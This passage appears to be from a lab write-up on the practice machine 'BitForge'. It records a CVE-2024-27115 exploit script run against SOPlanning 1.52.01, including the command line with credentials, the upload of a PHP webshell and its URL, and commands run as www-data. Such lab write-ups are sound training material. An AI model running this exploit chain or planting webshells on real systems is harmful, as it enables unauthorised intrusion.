RCE
The target SOPlanning instance is vulnerable to CVE-2024-27115 due to its outdated version; 1.52.01.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bitforge]
└─$ python3 CVE-2024-27115.py --target http://plan.bitforge.lab/www --username admin --password 'dbee8fd60fd4244695084bd84a996882|77ba9273d4bcfa9387ae8652377f4c189e5a47ee'
[+] Uploaded ===> File '3m5.php' was added to the task !
[+] Exploit completed.
Access webshell here: http://plan.bitforge.lab/www/upload/files/cjsqhs/3m5.php?cmd=<command>
Do you want an interactive shell? (yes/no) yes
soplaning:~$ whoami
www-data
soplaning:~$ hostname
BitForge
soplaning:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:5a:98 brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.196.186/24 brd 192.168.196.255 scope global ens192
valid_lft forever preferred_lft foreverUsing the same authentication bypass technique, exploit successful
Initial Foothold established to the target system as the www-data account via chaining an authentication bypass technique and CVE-2024-27115